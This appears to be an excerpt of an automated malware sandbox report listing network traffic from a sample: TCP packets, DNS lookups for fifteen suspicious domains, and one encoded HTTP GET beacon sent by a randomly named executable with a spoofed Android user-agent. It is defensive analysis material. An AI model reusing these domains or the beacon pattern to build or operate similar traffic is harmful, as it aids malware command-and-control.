                                                                                                                                Oct 29, 2024 16:56:34.302124023 CET4974680192.168.2.8107.163.130.253
                                                                                                                                Oct 29, 2024 16:56:34.726644039 CET4974680192.168.2.8107.163.130.253
                                                                                                                                Oct 29, 2024 16:56:35.745785952 CET4974780192.168.2.8107.163.130.253
                                                                                                                                Oct 29, 2024 16:56:36.201339960 CET8049747107.163.130.253192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:36.206022978 CET4974780192.168.2.8107.163.130.253
                                                                                                                                Oct 29, 2024 16:56:36.359710932 CET4974780192.168.2.8107.163.130.253
                                                                                                                                Oct 29, 2024 16:56:36.365271091 CET8049747107.163.130.253192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:36.365417004 CET8049747107.163.130.253192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:37.280574083 CET8049747107.163.130.253192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:37.320236921 CET4974780192.168.2.8107.163.130.253
                                                                                                                                Oct 29, 2024 16:56:37.368793964 CET8049747107.163.130.253192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:37.368890047 CET4974780192.168.2.8107.163.130.253
                                                                                                                                Oct 29, 2024 16:56:37.867244005 CET4974780192.168.2.8107.163.130.253
                                                                                                                                Oct 29, 2024 16:56:38.887628078 CET4974880192.168.2.8107.163.130.253
                                                                                                                                Oct 29, 2024 16:56:38.893040895 CET8049748107.163.130.253192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:38.893117905 CET4974880192.168.2.8107.163.130.253
                                                                                                                                Oct 29, 2024 16:56:38.902292967 CET4974880192.168.2.8107.163.130.253
                                                                                                                                Oct 29, 2024 16:56:38.907773972 CET8049748107.163.130.253192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:39.833916903 CET8049748107.163.130.253192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:39.886023998 CET4974880192.168.2.8107.163.130.253
                                                                                                                                Oct 29, 2024 16:56:40.013588905 CET8049748107.163.130.253192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:40.013719082 CET4974880192.168.2.8107.163.130.253
                                                                                                                                Oct 29, 2024 16:56:40.017967939 CET4974880192.168.2.8107.163.130.253
                                                                                                                                Oct 29, 2024 16:56:40.023375034 CET8049748107.163.130.253192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:45.179335117 CET4974980192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:45.185513020 CET804974995.216.25.89192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:45.185587883 CET4974980192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:45.198911905 CET4974980192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:45.205059052 CET804974995.216.25.89192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:46.061676979 CET804974995.216.25.89192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:46.101511955 CET4974980192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:46.411993980 CET804974995.216.25.89192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:46.414114952 CET4974980192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:46.711220980 CET4974980192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:47.734045982 CET4975080192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:47.739536047 CET804975095.216.25.89192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:47.746067047 CET4975080192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:47.754036903 CET4975080192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:47.759387970 CET804975095.216.25.89192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:48.637900114 CET804975095.216.25.89192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:48.679632902 CET4975080192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:48.996860027 CET804975095.216.25.89192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:48.996908903 CET4975080192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:49.257884026 CET4975080192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:50.276906013 CET4975180192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:50.282896042 CET804975195.216.25.89192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:50.283149004 CET4975180192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:50.294167042 CET4975180192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:50.299797058 CET804975195.216.25.89192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:50.301140070 CET804975195.216.25.89192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:51.149471998 CET804975195.216.25.89192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:51.195272923 CET4975180192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:51.490839005 CET804975195.216.25.89192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:51.490910053 CET4975180192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:51.805619001 CET4975180192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:52.825340986 CET4975280192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:52.831634998 CET804975295.216.25.89192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:52.831712008 CET4975280192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:52.841475964 CET4975280192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:52.847517967 CET804975295.216.25.89192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:53.693489075 CET804975295.216.25.89192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:53.746162891 CET4975280192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:54.036295891 CET804975295.216.25.89192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:54.038182020 CET4975280192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:54.042052031 CET4975280192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:54.354063034 CET4975280192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:54.367847919 CET804975295.216.25.89192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:54.372397900 CET804975295.216.25.89192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:54.372525930 CET4975280192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:59.075855970 CET4975380192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:56:59.081410885 CET80497533.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:59.081470966 CET4975380192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:56:59.095247030 CET4975380192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:56:59.100819111 CET80497533.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:59.775088072 CET80497533.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:59.782059908 CET4975380192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:57:00.604067087 CET4975380192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:57:00.609637022 CET80497533.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:01.622029066 CET4975480192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:57:01.627538919 CET80497543.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:01.627619028 CET4975480192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:57:01.641539097 CET4975480192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:57:01.646995068 CET80497543.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:02.256103039 CET80497543.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:02.256336927 CET4975480192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:57:03.148575068 CET4975480192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:57:03.154359102 CET80497543.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:04.172920942 CET4975580192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:57:04.178350925 CET80497553.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:04.179476023 CET4975580192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:57:04.194065094 CET4975580192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:57:04.199438095 CET80497553.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:04.199506044 CET80497553.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:04.836977959 CET80497553.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:04.837034941 CET4975580192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:57:05.695575953 CET4975580192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:57:05.701061010 CET80497553.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:06.714827061 CET4975680192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:57:06.720834017 CET80497563.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:06.720911980 CET4975680192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:57:06.729289055 CET4975680192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:57:06.735023975 CET80497563.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:07.339656115 CET80497563.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:07.382806063 CET4975680192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:57:07.674649000 CET80497563.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:07.674763918 CET4975680192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:57:07.675853968 CET4975680192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:57:07.681706905 CET80497563.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:13.090087891 CET4975780192.168.2.838.47.233.52
                                                                                                                                Oct 29, 2024 16:57:13.095655918 CET804975738.47.233.52192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:13.095705032 CET4975780192.168.2.838.47.233.52
                                                                                                                                Oct 29, 2024 16:57:13.112205982 CET4975780192.168.2.838.47.233.52
                                                                                                                                Oct 29, 2024 16:57:13.118231058 CET804975738.47.233.52192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:14.102221966 CET804975738.47.233.52192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:14.148436069 CET4975780192.168.2.838.47.233.52
                                                                                                                                Oct 29, 2024 16:57:14.298613071 CET804975738.47.233.52192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:14.298688889 CET4975780192.168.2.838.47.233.52
                                                                                                                                Oct 29, 2024 16:57:14.617278099 CET4975780192.168.2.838.47.233.52
                                                                                                                                Oct 29, 2024 16:57:15.637552023 CET4975880192.168.2.838.47.233.52
                                                                                                                                Oct 29, 2024 16:57:15.643013954 CET804975838.47.233.52192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:15.643120050 CET4975880192.168.2.838.47.233.52
                                                                                                                                Oct 29, 2024 16:57:15.656974077 CET4975880192.168.2.838.47.233.52
                                                                                                                                Oct 29, 2024 16:57:15.662549019 CET804975838.47.233.52192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:16.606427908 CET804975838.47.233.52192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:16.650077105 CET4975880192.168.2.838.47.233.52
                                                                                                                                Oct 29, 2024 16:57:16.868071079 CET804975838.47.233.52192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:16.868112087 CET804975838.47.233.52192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:16.868122101 CET4975880192.168.2.838.47.233.52
                                                                                                                                Oct 29, 2024 16:57:16.868149042 CET4975880192.168.2.838.47.233.52
                                                                                                                                Oct 29, 2024 16:57:17.164155960 CET4975880192.168.2.838.47.233.52
                                                                                                                                Oct 29, 2024 16:57:18.184392929 CET4975980192.168.2.838.47.233.52
                                                                                                                                Oct 29, 2024 16:57:18.191385031 CET804975938.47.233.52192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:18.191531897 CET4975980192.168.2.838.47.233.52
                                                                                                                                Oct 29, 2024 16:57:18.202681065 CET4975980192.168.2.838.47.233.52
                                                                                                                                Oct 29, 2024 16:57:18.209115982 CET804975938.47.233.52192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:18.209168911 CET804975938.47.233.52192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:19.216146946 CET804975938.47.233.52192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:19.318783045 CET4975980192.168.2.838.47.233.52
                                                                                                                                Oct 29, 2024 16:57:19.398484945 CET804975938.47.233.52192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:19.398547888 CET4975980192.168.2.838.47.233.52
                                                                                                                                Oct 29, 2024 16:57:19.710997105 CET4975980192.168.2.838.47.233.52
                                                                                                                                Oct 29, 2024 16:57:20.730026007 CET4976080192.168.2.838.47.233.52
                                                                                                                                Oct 29, 2024 16:57:20.735420942 CET804976038.47.233.52192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:20.738178015 CET4976080192.168.2.838.47.233.52
                                                                                                                                Oct 29, 2024 16:57:20.748868942 CET4976080192.168.2.838.47.233.52
                                                                                                                                Oct 29, 2024 16:57:20.754359961 CET804976038.47.233.52192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:21.717084885 CET804976038.47.233.52192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:21.758107901 CET4976080192.168.2.838.47.233.52
                                                                                                                                Oct 29, 2024 16:57:21.900741100 CET804976038.47.233.52192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:21.906652927 CET4976080192.168.2.838.47.233.52
                                                                                                                                Oct 29, 2024 16:57:21.907119989 CET4976080192.168.2.838.47.233.52
                                                                                                                                Oct 29, 2024 16:57:21.912858009 CET804976038.47.233.52192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:26.975500107 CET4976180192.168.2.813.248.169.48
                                                                                                                                Oct 29, 2024 16:57:26.981251955 CET804976113.248.169.48192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:26.981334925 CET4976180192.168.2.813.248.169.48
                                                                                                                                Oct 29, 2024 16:57:27.001729012 CET4976180192.168.2.813.248.169.48
                                                                                                                                Oct 29, 2024 16:57:27.007405043 CET804976113.248.169.48192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:27.718668938 CET804976113.248.169.48192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:27.718739986 CET4976180192.168.2.813.248.169.48
                                                                                                                                Oct 29, 2024 16:57:28.507879019 CET4976180192.168.2.813.248.169.48
                                                                                                                                Oct 29, 2024 16:57:28.513319969 CET804976113.248.169.48192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:30.267539978 CET4976280192.168.2.813.248.169.48
                                                                                                                                Oct 29, 2024 16:57:30.273794889 CET804976213.248.169.48192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:30.273879051 CET4976280192.168.2.813.248.169.48
                                                                                                                                Oct 29, 2024 16:57:30.284787893 CET4976280192.168.2.813.248.169.48
                                                                                                                                Oct 29, 2024 16:57:30.291193962 CET804976213.248.169.48192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:30.994170904 CET804976213.248.169.48192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:30.994244099 CET4976280192.168.2.813.248.169.48
                                                                                                                                Oct 29, 2024 16:57:31.790106058 CET4976280192.168.2.813.248.169.48
                                                                                                                                Oct 29, 2024 16:57:31.795804024 CET804976213.248.169.48192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:32.811503887 CET4976380192.168.2.813.248.169.48
                                                                                                                                Oct 29, 2024 16:57:33.062500000 CET804976313.248.169.48192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:33.062589884 CET4976380192.168.2.813.248.169.48
                                                                                                                                Oct 29, 2024 16:57:33.479274035 CET4976380192.168.2.813.248.169.48
                                                                                                                                Oct 29, 2024 16:57:33.484709024 CET804976313.248.169.48192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:33.484899044 CET804976313.248.169.48192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:33.736035109 CET804976313.248.169.48192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:33.736121893 CET4976380192.168.2.813.248.169.48

                                                                                                                                UDP Packets

                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Oct 29, 2024 16:54:07.427656889 CET5614553192.168.2.81.1.1.1
                                                                                                                                Oct 29, 2024 16:54:07.729743958 CET53561451.1.1.1192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:23.839576960 CET6257553192.168.2.81.1.1.1
                                                                                                                                Oct 29, 2024 16:54:23.967005014 CET53625751.1.1.1192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:37.761424065 CET6292853192.168.2.81.1.1.1
                                                                                                                                Oct 29, 2024 16:54:37.869055986 CET53629281.1.1.1192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:51.684420109 CET6140653192.168.2.81.1.1.1
                                                                                                                                Oct 29, 2024 16:54:51.699052095 CET53614061.1.1.1192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:06.121714115 CET5644353192.168.2.81.1.1.1
                                                                                                                                Oct 29, 2024 16:55:06.140666008 CET53564431.1.1.1192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:20.071427107 CET5784953192.168.2.81.1.1.1
                                                                                                                                Oct 29, 2024 16:55:20.140212059 CET53578491.1.1.1192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:33.855431080 CET5576553192.168.2.81.1.1.1
                                                                                                                                Oct 29, 2024 16:55:33.927226067 CET53557651.1.1.1192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:48.262214899 CET6246353192.168.2.81.1.1.1
                                                                                                                                Oct 29, 2024 16:55:48.794226885 CET53624631.1.1.1192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:02.504802942 CET5727053192.168.2.81.1.1.1
                                                                                                                                Oct 29, 2024 16:56:02.568098068 CET53572701.1.1.1192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:16.420123100 CET5739253192.168.2.81.1.1.1
                                                                                                                                Oct 29, 2024 16:56:16.444863081 CET53573921.1.1.1192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:30.214814901 CET5528853192.168.2.81.1.1.1
                                                                                                                                Oct 29, 2024 16:56:30.644201994 CET53552881.1.1.1192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:45.028891087 CET5193253192.168.2.81.1.1.1
                                                                                                                                Oct 29, 2024 16:56:45.176309109 CET53519321.1.1.1192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:59.059731960 CET5466353192.168.2.81.1.1.1
                                                                                                                                Oct 29, 2024 16:56:59.072967052 CET53546631.1.1.1192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:12.683146954 CET5095853192.168.2.81.1.1.1
                                                                                                                                Oct 29, 2024 16:57:13.086227894 CET53509581.1.1.1192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:26.951071978 CET6394153192.168.2.81.1.1.1
                                                                                                                                Oct 29, 2024 16:57:26.971343994 CET53639411.1.1.1192.168.2.8

                                                                                                                                DNS Queries

                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                Oct 29, 2024 16:54:07.427656889 CET192.168.2.81.1.1.10xc0acStandard query (0)www.dpo-medicina.onlineA (IP address)IN (0x0001)false
                                                                                                                                Oct 29, 2024 16:54:23.839576960 CET192.168.2.81.1.1.10x76e8Standard query (0)www.gold-rates.onlineA (IP address)IN (0x0001)false
                                                                                                                                Oct 29, 2024 16:54:37.761424065 CET192.168.2.81.1.1.10x7424Standard query (0)www.loginov.enterprisesA (IP address)IN (0x0001)false
                                                                                                                                Oct 29, 2024 16:54:51.684420109 CET192.168.2.81.1.1.10xcb6dStandard query (0)www.2925588.comA (IP address)IN (0x0001)false
                                                                                                                                Oct 29, 2024 16:55:06.121714115 CET192.168.2.81.1.1.10xc0ccStandard query (0)www.treatyourownhip.onlineA (IP address)IN (0x0001)false
                                                                                                                                Oct 29, 2024 16:55:20.071427107 CET192.168.2.81.1.1.10x6820Standard query (0)www.premium303max.restA (IP address)IN (0x0001)false
                                                                                                                                Oct 29, 2024 16:55:33.855431080 CET192.168.2.81.1.1.10x4699Standard query (0)www.adsdomain-195.clickA (IP address)IN (0x0001)false
                                                                                                                                Oct 29, 2024 16:55:48.262214899 CET192.168.2.81.1.1.10x6986Standard query (0)www.broork.sbsA (IP address)IN (0x0001)false
                                                                                                                                Oct 29, 2024 16:56:02.504802942 CET192.168.2.81.1.1.10x863fStandard query (0)www.nutrigenfit.onlineA (IP address)IN (0x0001)false
                                                                                                                                Oct 29, 2024 16:56:16.420123100 CET192.168.2.81.1.1.10xa98eStandard query (0)www.plyvik.infoA (IP address)IN (0x0001)false
                                                                                                                                Oct 29, 2024 16:56:30.214814901 CET192.168.2.81.1.1.10x3280Standard query (0)www.68529.xyzA (IP address)IN (0x0001)false
                                                                                                                                Oct 29, 2024 16:56:45.028891087 CET192.168.2.81.1.1.10xd0edStandard query (0)www.bulbulun.netA (IP address)IN (0x0001)false
                                                                                                                                Oct 29, 2024 16:56:59.059731960 CET192.168.2.81.1.1.10xbe50Standard query (0)www.smithsmobilewash.netA (IP address)IN (0x0001)false
                                                                                                                                Oct 29, 2024 16:57:12.683146954 CET192.168.2.81.1.1.10xaab6Standard query (0)www.2q33e.topA (IP address)IN (0x0001)false
                                                                                                                                Oct 29, 2024 16:57:26.951071978 CET192.168.2.81.1.1.10x7716Standard query (0)www.tangible.onlineA (IP address)IN (0x0001)false

                                                                                                                                DNS Answers

                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                Oct 29, 2024 16:54:07.729743958 CET1.1.1.1192.168.2.80xc0acNo error (0)www.dpo-medicina.online194.58.112.174A (IP address)IN (0x0001)false
                                                                                                                                Oct 29, 2024 16:54:23.967005014 CET1.1.1.1192.168.2.80x76e8No error (0)www.gold-rates.online199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                                Oct 29, 2024 16:54:37.869055986 CET1.1.1.1192.168.2.80x7424No error (0)www.loginov.enterprisesloginov.enterprisesCNAME (Canonical name)IN (0x0001)false
                                                                                                                                Oct 29, 2024 16:54:37.869055986 CET1.1.1.1192.168.2.80x7424No error (0)loginov.enterprises3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                Oct 29, 2024 16:54:37.869055986 CET1.1.1.1192.168.2.80x7424No error (0)loginov.enterprises15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                Oct 29, 2024 16:54:51.699052095 CET1.1.1.1192.168.2.80xcb6dNo error (0)www.2925588.com103.71.154.12A (IP address)IN (0x0001)false
                                                                                                                                Oct 29, 2024 16:55:06.140666008 CET1.1.1.1192.168.2.80xc0ccNo error (0)www.treatyourownhip.onlinetreatyourownhip.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                                Oct 29, 2024 16:55:06.140666008 CET1.1.1.1192.168.2.80xc0ccNo error (0)treatyourownhip.online81.169.145.95A (IP address)IN (0x0001)false
                                                                                                                                Oct 29, 2024 16:55:20.140212059 CET1.1.1.1192.168.2.80x6820No error (0)www.premium303max.rest45.79.252.94A (IP address)IN (0x0001)false
                                                                                                                                Oct 29, 2024 16:55:33.927226067 CET1.1.1.1192.168.2.80x4699No error (0)www.adsdomain-195.click199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                                Oct 29, 2024 16:55:48.794226885 CET1.1.1.1192.168.2.80x6986No error (0)www.broork.sbs163.44.176.12A (IP address)IN (0x0001)false
                                                                                                                                Oct 29, 2024 16:56:02.568098068 CET1.1.1.1192.168.2.80x863fNo error (0)www.nutrigenfit.onlinenutrigenfit.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                                Oct 29, 2024 16:56:02.568098068 CET1.1.1.1192.168.2.80x863fNo error (0)nutrigenfit.online195.110.124.133A (IP address)IN (0x0001)false
                                                                                                                                Oct 29, 2024 16:56:16.444863081 CET1.1.1.1192.168.2.80xa98eNo error (0)www.plyvik.info67.223.117.142A (IP address)IN (0x0001)false
                                                                                                                                Oct 29, 2024 16:56:30.644201994 CET1.1.1.1192.168.2.80x3280No error (0)www.68529.xyz107.163.130.253A (IP address)IN (0x0001)false
                                                                                                                                Oct 29, 2024 16:56:45.176309109 CET1.1.1.1192.168.2.80xd0edNo error (0)www.bulbulun.net95.216.25.89A (IP address)IN (0x0001)false
                                                                                                                                Oct 29, 2024 16:56:59.072967052 CET1.1.1.1192.168.2.80xbe50No error (0)www.smithsmobilewash.netsmithsmobilewash.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                Oct 29, 2024 16:56:59.072967052 CET1.1.1.1192.168.2.80xbe50No error (0)smithsmobilewash.net3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                Oct 29, 2024 16:56:59.072967052 CET1.1.1.1192.168.2.80xbe50No error (0)smithsmobilewash.net15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                Oct 29, 2024 16:57:13.086227894 CET1.1.1.1192.168.2.80xaab6No error (0)www.2q33e.top2q33e.topCNAME (Canonical name)IN (0x0001)false
                                                                                                                                Oct 29, 2024 16:57:13.086227894 CET1.1.1.1192.168.2.80xaab6No error (0)2q33e.top38.47.233.52A (IP address)IN (0x0001)false
                                                                                                                                Oct 29, 2024 16:57:26.971343994 CET1.1.1.1192.168.2.80x7716No error (0)www.tangible.online13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                Oct 29, 2024 16:57:26.971343994 CET1.1.1.1192.168.2.80x7716No error (0)www.tangible.online76.223.54.146A (IP address)IN (0x0001)false

                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                • www.dpo-medicina.online
                                                                                                                                • www.gold-rates.online
                                                                                                                                • www.loginov.enterprises
                                                                                                                                • www.2925588.com
                                                                                                                                • www.treatyourownhip.online
                                                                                                                                • www.premium303max.rest
                                                                                                                                • www.adsdomain-195.click
                                                                                                                                • www.broork.sbs
                                                                                                                                • www.nutrigenfit.online
                                                                                                                                • www.plyvik.info
                                                                                                                                • www.68529.xyz
                                                                                                                                • www.bulbulun.net
                                                                                                                                • www.smithsmobilewash.net
                                                                                                                                • www.2q33e.top
                                                                                                                                • www.tangible.online

                                                                                                                                HTTP Packets

                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                0192.168.2.849707194.58.112.174805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:54:07.750056028 CET434OUTGET /hzvv/?mRR=Vxudf0fHzLw84n3P&edD=rORncVVdvgzWlpxqVdy6wyOp/+Tf7AwoM18MThSKdmZP0ohcmrwEBuX8zFjiIhpadHd1pz5OrNzpltMAb4bxQj9ydLcasKlfpoifhU3jpBZMJYPNfPfapl2Jiho/Qt0KOg== HTTP/1.1
                                                                                                                                Host: www.dpo-medicina.online
                                                                                                                                Accept: */*
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Connection: close
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Oct 29, 2024 16:54:08.641187906 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                Server: nginx
                                                                                                                                Date: Tue, 29 Oct 2024 15:54:08 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
